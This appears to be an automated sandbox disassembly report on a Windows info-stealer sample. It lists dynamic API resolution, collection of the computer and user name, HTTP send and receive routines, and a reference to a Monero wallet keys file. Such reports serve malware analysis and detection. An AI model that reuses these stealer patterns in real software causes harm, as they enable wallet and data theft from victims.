                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: b26bbaff56d108c9e2f4ce6aae254cdd19082c12e142a645445375009e39a3e8
                        • Instruction ID: 657c2da8e21341862c30f15941a93b74ddf5221aaf7b669631ab27b3f9b74c82
                        • Opcode Fuzzy Hash: b26bbaff56d108c9e2f4ce6aae254cdd19082c12e142a645445375009e39a3e8
                        • Instruction Fuzzy Hash: 3E41F6607C260C6ACE24B7A4AC6EDFD7756FF63744F506054EC60B2780CBF86A894726
                        Function 00864880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 801 864880-864942 call 87a7a0 call 8647b0 call 87a740 * 5 InternetOpenA StrCmpCA 816 864944 801->816 817 86494b-86494f 801->817 816->817 818 864955-864acd call 878b60 call 87a920 call 87a8a0 call 87a800 * 2 call 87a9b0 call 87a8a0 call 87a800 call 87a9b0 call 87a8a0 call 87a800 call 87a920 call 87a8a0 call 87a800 call 87a9b0 call 87a8a0 call 87a800 call 87a9b0 call 87a8a0 call 87a800 call 87a9b0 call 87a920 call 87a8a0 call 87a800 * 2 InternetConnectA 817->818 819 864ecb-864ef3 InternetCloseHandle call 87aad0 call 869ac0 817->819 818->819 905 864ad3-864ad7 818->905 829 864ef5-864f2d call 87a820 call 87a9b0 call 87a8a0 call 87a800 819->829 830 864f32-864fa2 call 878990 * 2 call 87a7a0 call 87a800 * 8 819->830 829->830 906 864ae5 905->906 907 864ad9-864ae3 905->907 908 864aef-864b22 HttpOpenRequestA 906->908 907->908 909 864ebe-864ec5 InternetCloseHandle 908->909 910 864b28-864e28 call 87a9b0 call 87a8a0 call 87a800 call 87a920 call 87a8a0 call 87a800 call 87a9b0 call 87a8a0 call 87a800 call 87a9b0 call 87a8a0 call 87a800 call 87a9b0 call 87a8a0 call 87a800 call 87a9b0 call 87a8a0 call 87a800 call 87a920 call 87a8a0 call 87a800 call 87a9b0 call 87a8a0 call 87a800 call 87a9b0 call 87a8a0 call 87a800 call 87a920 call 87a8a0 call 87a800 call 87a9b0 call 87a8a0 call 87a800 call 87a9b0 call 87a8a0 call 87a800 call 87a9b0 call 87a8a0 call 87a800 call 87a9b0 call 87a8a0 call 87a800 call 87a920 call 87a8a0 call 87a800 call 87a740 call 87a920 * 2 call 87a8a0 call 87a800 * 2 call 87aad0 lstrlen call 87aad0 * 2 lstrlen call 87aad0 HttpSendRequestA 908->910 909->819 1021 864e32-864e5c InternetReadFile 910->1021 1022 864e67-864eb9 InternetCloseHandle call 87a800 1021->1022 1023 864e5e-864e65 1021->1023 1022->909 1023->1022 1024 864e69-864ea7 call 87a9b0 call 87a8a0 call 87a800 1023->1024 1024->1021
                        APIs
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                          • Part of subcall function 008647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00864839
                          • Part of subcall function 008647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00864849
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00864915
                        • StrCmpCA.SHLWAPI(?,0116ED88), ref: 0086493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00864ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00880DDB,00000000,?,?,00000000,?,",00000000,?,0116ED18), ref: 00864DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00864E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00864E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00864E49
                        • InternetCloseHandle.WININET(00000000), ref: 00864EAD
                        • InternetCloseHandle.WININET(00000000), ref: 00864EC5
                        • HttpOpenRequestA.WININET(00000000,0116EDA8,?,0116E750,00000000,00000000,00400100,00000000), ref: 00864B15
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                        • InternetCloseHandle.WININET(00000000), ref: 00864ECF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 460715078-2180234286
                        • Opcode ID: 6ede43e09007dc41e93c958c1f4c5eb7aca8e972c0f429193bc7b1f58a5ab3da
                        • Instruction ID: 3e9142d4d81e1cf55e8a7232fd54e396dbb61fac51516283844269a5a8270678
                        • Opcode Fuzzy Hash: 6ede43e09007dc41e93c958c1f4c5eb7aca8e972c0f429193bc7b1f58a5ab3da
                        • Instruction Fuzzy Hash: 14120F719101189ADB19EBA4DC92FEEB778FF54300F5081A9B11AA2095DF706F49CF63
                        Function 008778E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00877910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00877917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 0087792F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: 1d04dcff6daf5c2842bd87c2ad8b8f811ccbe071d6c4fa9b6b784e00c905cfff
                        • Instruction ID: 4edf2b6d2abe5ffd4f0246f480d328253b4db706c584b2b45e3b518a2eef6f09
                        • Opcode Fuzzy Hash: 1d04dcff6daf5c2842bd87c2ad8b8f811ccbe071d6c4fa9b6b784e00c905cfff
                        • Instruction Fuzzy Hash: 340186B1904209EFC700DFD4DD45BAABBF8FB05B21F104219F645E3280C3785904CBA2
                        Function 00877850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008611B7), ref: 00877880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00877887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0087789F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: f73b4c280847de73e84dc4681c35e59c614f9f46ea7059f1629fdd71f2ee22d9
                        • Instruction ID: 09e2d11e4bc54d5fe854ad34f111d290c4b5f584aaa42a5a56ff3357c6003331
                        • Opcode Fuzzy Hash: f73b4c280847de73e84dc4681c35e59c614f9f46ea7059f1629fdd71f2ee22d9
                        • Instruction Fuzzy Hash: 2BF044B1944209ABC700DFD4DD45FAEBBF8FB09711F100159FA15E2680C7785505CBA1
                        Function 00861160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: 2e3bb39154bec08c12252dec9364e46eac4de7ce8276924abeab6947cf2ba109
                        • Instruction ID: 015ebf2de52d4f2a3fc87f2e1df6b329c34bfcf48871df7388fb058f7615ddad
                        • Opcode Fuzzy Hash: 2e3bb39154bec08c12252dec9364e46eac4de7ce8276924abeab6947cf2ba109
                        • Instruction Fuzzy Hash: AED05E7490030DDBCB00DFE0D8496EEBBB8FB09311F001554D905A2380EB305882CBA6
                        Function 00879C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 633 879c10-879c1a 634 87a036-87a0ca LoadLibraryA * 8 633->634 635 879c20-87a031 GetProcAddress * 43 633->635 636 87a146-87a14d 634->636 637 87a0cc-87a141 GetProcAddress * 5 634->637 635->634 638 87a216-87a21d 636->638 639 87a153-87a211 GetProcAddress * 8 636->639 637->636 640 87a21f-87a293 GetProcAddress * 5 638->640 641 87a298-87a29f 638->641 639->638 640->641 642 87a337-87a33e 641->642 643 87a2a5-87a332 GetProcAddress * 6 641->643 644 87a344-87a41a GetProcAddress * 9 642->644 645 87a41f-87a426 642->645 643->642 644->645 646 87a4a2-87a4a9 645->646 647 87a428-87a49d GetProcAddress * 5 645->647 648 87a4dc-87a4e3 646->648 649 87a4ab-87a4d7 GetProcAddress * 2 646->649 647->646 650 87a515-87a51c 648->650 651 87a4e5-87a510 GetProcAddress * 2 648->651 649->648 652 87a612-87a619 650->652 653 87a522-87a60d GetProcAddress * 10 650->653 651->650 654 87a67d-87a684 652->654 655 87a61b-87a678 GetProcAddress * 4 652->655 653->652 656 87a686-87a699 GetProcAddress 654->656 657 87a69e-87a6a5 654->657 655->654 656->657 658 87a6a7-87a703 GetProcAddress * 4 657->658 659 87a708-87a709 657->659 658->659
                        APIs
                        • GetProcAddress.KERNEL32(75900000,011572A8), ref: 00879C2D
                        • GetProcAddress.KERNEL32(75900000,01157408), ref: 00879C45
                        • GetProcAddress.KERNEL32(75900000,011699E0), ref: 00879C5E
                        • GetProcAddress.KERNEL32(75900000,011697E8), ref: 00879C76
                        • GetProcAddress.KERNEL32(75900000,0116D5C0), ref: 00879C8E
                        • GetProcAddress.KERNEL32(75900000,0116D380), ref: 00879CA7
                        • GetProcAddress.KERNEL32(75900000,0115BB38), ref: 00879CBF
                        • GetProcAddress.KERNEL32(75900000,0116D4E8), ref: 00879CD7
                        • GetProcAddress.KERNEL32(75900000,0116D4B8), ref: 00879CF0
                        • GetProcAddress.KERNEL32(75900000,0116D4D0), ref: 00879D08
                        • GetProcAddress.KERNEL32(75900000,0116D500), ref: 00879D20
                        • GetProcAddress.KERNEL32(75900000,01157468), ref: 00879D39
                        • GetProcAddress.KERNEL32(75900000,011575C8), ref: 00879D51
                        • GetProcAddress.KERNEL32(75900000,01157328), ref: 00879D69
                        • GetProcAddress.KERNEL32(75900000,011575E8), ref: 00879D82
                        • GetProcAddress.KERNEL32(75900000,0116D4A0), ref: 00879D9A
                        • GetProcAddress.KERNEL32(75900000,0116D530), ref: 00879DB2
                        • GetProcAddress.KERNEL32(75900000,0115BD40), ref: 00879DCB
                        • GetProcAddress.KERNEL32(75900000,01157488), ref: 00879DE3
                        • GetProcAddress.KERNEL32(75900000,0116D518), ref: 00879DFB
                        • GetProcAddress.KERNEL32(75900000,0116D578), ref: 00879E14
                        • GetProcAddress.KERNEL32(75900000,0116D548), ref: 00879E2C
                        • GetProcAddress.KERNEL32(75900000,0116D5A8), ref: 00879E44
                        • GetProcAddress.KERNEL32(75900000,01157608), ref: 00879E5D
                        • GetProcAddress.KERNEL32(75900000,0116D458), ref: 00879E75
                        • GetProcAddress.KERNEL32(75900000,0116D3F8), ref: 00879E8D
                        • GetProcAddress.KERNEL32(75900000,0116D5D8), ref: 00879EA6
                        • GetProcAddress.KERNEL32(75900000,0116D5F0), ref: 00879EBE
                        • GetProcAddress.KERNEL32(75900000,0116D608), ref: 00879ED6
                        • GetProcAddress.KERNEL32(75900000,0116D368), ref: 00879EEF
                        • GetProcAddress.KERNEL32(75900000,0116D398), ref: 00879F07
                        • GetProcAddress.KERNEL32(75900000,0116D428), ref: 00879F1F
                        • GetProcAddress.KERNEL32(75900000,0116D590), ref: 00879F38
                        • GetProcAddress.KERNEL32(75900000,0116AAD8), ref: 00879F50
                        • GetProcAddress.KERNEL32(75900000,0116D560), ref: 00879F68
                        • GetProcAddress.KERNEL32(75900000,0116D620), ref: 00879F81
                        • GetProcAddress.KERNEL32(75900000,011574E8), ref: 00879F99
                        • GetProcAddress.KERNEL32(75900000,0116D638), ref: 00879FB1
                        • GetProcAddress.KERNEL32(75900000,01157288), ref: 00879FCA
                        • GetProcAddress.KERNEL32(75900000,0116D350), ref: 00879FE2
                        • GetProcAddress.KERNEL32(75900000,0116D3B0), ref: 00879FFA
                        • GetProcAddress.KERNEL32(75900000,011571C8), ref: 0087A013
                        • GetProcAddress.KERNEL32(75900000,01156F08), ref: 0087A02B
                        • LoadLibraryA.KERNEL32(0116D3C8,?,00875CA3,00880AEB,?,?,?,?,?,?,?,?,?,?,00880AEA,00880AE3), ref: 0087A03D
                        • LoadLibraryA.KERNEL32(0116D3E0,?,00875CA3,00880AEB,?,?,?,?,?,?,?,?,?,?,00880AEA,00880AE3), ref: 0087A04E
                        • LoadLibraryA.KERNEL32(0116D410,?,00875CA3,00880AEB,?,?,?,?,?,?,?,?,?,?,00880AEA,00880AE3), ref: 0087A060
                        • LoadLibraryA.KERNEL32(0116D440,?,00875CA3,00880AEB,?,?,?,?,?,?,?,?,?,?,00880AEA,00880AE3), ref: 0087A072
                        • LoadLibraryA.KERNEL32(0116D470,?,00875CA3,00880AEB,?,?,?,?,?,?,?,?,?,?,00880AEA,00880AE3), ref: 0087A083
                        • LoadLibraryA.KERNEL32(0116D488,?,00875CA3,00880AEB,?,?,?,?,?,?,?,?,?,?,00880AEA,00880AE3), ref: 0087A095
                        • LoadLibraryA.KERNEL32(0116D830,?,00875CA3,00880AEB,?,?,?,?,?,?,?,?,?,?,00880AEA,00880AE3), ref: 0087A0A7
                        • LoadLibraryA.KERNEL32(0116D770,?,00875CA3,00880AEB,?,?,?,?,?,?,?,?,?,?,00880AEA,00880AE3), ref: 0087A0B8
                        • GetProcAddress.KERNEL32(75FD0000,011570E8), ref: 0087A0DA
                        • GetProcAddress.KERNEL32(75FD0000,0116D8F0), ref: 0087A0F2
                        • GetProcAddress.KERNEL32(75FD0000,011693E8), ref: 0087A10A
                        • GetProcAddress.KERNEL32(75FD0000,0116D8D8), ref: 0087A123
                        • GetProcAddress.KERNEL32(75FD0000,01156FE8), ref: 0087A13B
                        • GetProcAddress.KERNEL32(6FEA0000,0115BAE8), ref: 0087A160
                        • GetProcAddress.KERNEL32(6FEA0000,01157208), ref: 0087A179
                        • GetProcAddress.KERNEL32(6FEA0000,0115BD68), ref: 0087A191
                        • GetProcAddress.KERNEL32(6FEA0000,0116D7A0), ref: 0087A1A9
                        • GetProcAddress.KERNEL32(6FEA0000,0116D8A8), ref: 0087A1C2
                        • GetProcAddress.KERNEL32(6FEA0000,01156F68), ref: 0087A1DA
                        • GetProcAddress.KERNEL32(6FEA0000,01157008), ref: 0087A1F2
                        • GetProcAddress.KERNEL32(6FEA0000,0116D6B0), ref: 0087A20B
                        • GetProcAddress.KERNEL32(763B0000,01157188), ref: 0087A22C
                        • GetProcAddress.KERNEL32(763B0000,01157108), ref: 0087A244
                        • GetProcAddress.KERNEL32(763B0000,0116D7D0), ref: 0087A25D
                        • GetProcAddress.KERNEL32(763B0000,0116D7E8), ref: 0087A275
                        • GetProcAddress.KERNEL32(763B0000,01157128), ref: 0087A28D
                        • GetProcAddress.KERNEL32(750F0000,0115BB88), ref: 0087A2B3
                        • GetProcAddress.KERNEL32(750F0000,0115B9D0), ref: 0087A2CB
                        • GetProcAddress.KERNEL32(750F0000,0116D740), ref: 0087A2E3
                        • GetProcAddress.KERNEL32(750F0000,01156F88), ref: 0087A2FC
                        • GetProcAddress.KERNEL32(750F0000,01156F28), ref: 0087A314
                        • GetProcAddress.KERNEL32(750F0000,0115BA20), ref: 0087A32C
                        • GetProcAddress.KERNEL32(75A50000,0116D758), ref: 0087A352
                        • GetProcAddress.KERNEL32(75A50000,01156E88), ref: 0087A36A
                        • GetProcAddress.KERNEL32(75A50000,01169558), ref: 0087A382
                        • GetProcAddress.KERNEL32(75A50000,0116D8C0), ref: 0087A39B
                        • GetProcAddress.KERNEL32(75A50000,0116D848), ref: 0087A3B3
                        • GetProcAddress.KERNEL32(75A50000,01156EA8), ref: 0087A3CB
                        • GetProcAddress.KERNEL32(75A50000,01156FC8), ref: 0087A3E4
                        • GetProcAddress.KERNEL32(75A50000,0116D860), ref: 0087A3FC
                        • GetProcAddress.KERNEL32(75A50000,0116D680), ref: 0087A414
                        • GetProcAddress.KERNEL32(75070000,01157228), ref: 0087A436
                        • GetProcAddress.KERNEL32(75070000,0116D728), ref: 0087A44E
                        • GetProcAddress.KERNEL32(75070000,0116D908), ref: 0087A466
                        • GetProcAddress.KERNEL32(75070000,0116D878), ref: 0087A47F
                        • GetProcAddress.KERNEL32(75070000,0116D788), ref: 0087A497
                        • GetProcAddress.KERNEL32(74E50000,011571E8), ref: 0087A4B8
                        • GetProcAddress.KERNEL32(74E50000,01157148), ref: 0087A4D1
                        • GetProcAddress.KERNEL32(75320000,01156F48), ref: 0087A4F2
                        • GetProcAddress.KERNEL32(75320000,0116D668), ref: 0087A50A
                        • GetProcAddress.KERNEL32(6F060000,01156FA8), ref: 0087A530
                        • GetProcAddress.KERNEL32(6F060000,011571A8), ref: 0087A548
                        • GetProcAddress.KERNEL32(6F060000,01157028), ref: 0087A560
                        • GetProcAddress.KERNEL32(6F060000,0116D6C8), ref: 0087A579
                        • GetProcAddress.KERNEL32(6F060000,01157048), ref: 0087A591
